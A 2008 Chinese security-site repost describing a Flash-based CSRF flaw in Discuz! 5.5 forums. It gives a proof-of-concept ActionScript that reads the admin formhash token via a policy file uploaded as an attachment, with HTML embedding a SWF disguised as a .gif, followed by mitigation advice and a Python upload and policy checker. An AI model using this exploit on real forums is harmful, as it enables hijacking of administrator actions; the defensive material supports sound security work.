华盟网 - http://www.77169.com

Discuz! flash csrf vul

2008/11/2 Author: unknown Source: Internet
Introduction (77169.com editor): Discuz! flash csrf vul; the main cause of the problem is a Discuz! vulnerability.

POC (tested on Discuz! 5.5; for other versions write your own) follows:

Flash source file: http://www.80vul.com/dzvul/sodb/01/sodb-2008-02.fla

The ActionScript code is as follows:

import RegExp;
// Ask Flash Player to honour the policy file served by the forum host; once the
// movie is served from that same host, this allows it to read responses from it.
System.security.loadPolicyFile("http://www.80vul.com/bbs/crossdomain.xml");

var xml:XML = new XML();
xml.onData = function(s) {
    // Pull the formhash token out of the fetched admin page and show it in the
    // text field tb1 (assumed to exist on the stage).
    tb1.text = getFirstMatch(new RegExp("<input type=\"hidden\" name=\"formhash\" value=\"(\\w+)\" />", "ig"), s, 1);
};
// Fetch the admin page as raw text; onData receives the whole response body.
xml.load("http://www.80vul.com/bbs/admincp.php?action=members");

// Return capture group i of the first match of re in s, or undefined if none.
function getFirstMatch(re, s, i) {
    var m = null;
    if ((m = re.exec(s)) != null) {
        return m[i];
    }
}



HTML used to invoke it remotely:

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
        codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0"
        width="550" height="400">
  <param name="allowScriptAccess" value="sameDomain">
  <param name="movie" value="http://www.80vul.com/bbs/attachments/month_0810/20081030_a293d131d2da23ead5805QYWvs5tkBpi.gif">
  <param name="quality" value="high">
  <param name="bgcolor" value="#ffffff">
  <embed src="http://www.80vul.com/bbs/attachments/month_0810/20081030_a293d131d2da23ead5805QYWvs5tkBpi.gif"
         quality="high" bgcolor="#ffffff" allowscriptaccess="sameDomain"
         type="application/x-shockwave-flash"
         pluginspage="http://www.macromedia.com/go/getflashplayer"
         width="550" height="400">
</object>

77169.com security advice: deleting crossdomain.xml does not fully fix this vulnerability. A policy file can have any file name as long as loadPolicyFile() is pointed at it, so an attacker can upload a renamed crossdomain.xml through the attachment upload or a similar feature.
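Two server-side checks that follow from the advice above, as an added example (not code from the original post or from Discuz!): attachments are inspected by content, rejecting SWF movies that were renamed to .gif and XML that is really a cross-domain policy file, and the master /crossdomain.xml is checked for the site-control meta-policy that makes Flash Player ignore policy files under any other name. File names, sample bytes and the allowed image list are constructed for the example.

```python
"""Upload and policy-file checks against Flash cross-domain abuse (added example)."""
import re
import xml.etree.ElementTree as ET
from typing import Optional

SWF_MAGIC = (b"FWS", b"CWS", b"ZWS")          # plain, zlib and LZMA compressed SWF
IMAGE_MAGIC = {                               # assumed allow-list for attachments
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
}
POLICY_RE = re.compile(rb"<\s*cross-domain-policy\b", re.IGNORECASE)


def check_upload(filename: str, data: bytes) -> Optional[str]:
    """Return a rejection reason, or None if the attachment may be stored.

    Flash Player sniffs content and ignores the extension, so the extension
    alone says nothing about whether a file will run as a movie.
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    head = data[:4096]
    if head.startswith(SWF_MAGIC):
        return "content is a SWF movie regardless of extension"
    if POLICY_RE.search(head):               # conservative: any policy tag in the head
        return "content is a Flash cross-domain policy file"
    magics = IMAGE_MAGIC.get("jpg" if ext == "jpeg" else ext)
    if magics is None:
        return f"extension .{ext or '(none)'} is not an allowed image type"
    if not head.startswith(magics):
        return f"content does not match the .{ext} signature"
    return None


def master_policy_is_locked_down(master_xml: bytes) -> bool:
    """True if /crossdomain.xml explicitly restricts policy files to itself.

    With <site-control permitted-cross-domain-policies="master-only"/>
    (honoured by Flash Player 9.0.124 and later) a renamed crossdomain.xml
    in an upload directory is ignored by loadPolicyFile(); "none" disables
    policy files entirely.  Absent or weaker settings count as not locked down.
    """
    try:
        root = ET.fromstring(master_xml)
    except ET.ParseError:
        return False
    for sc in root.iter("site-control"):
        if sc.get("permitted-cross-domain-policies", "").lower() in ("master-only", "none"):
            return True
    return False
```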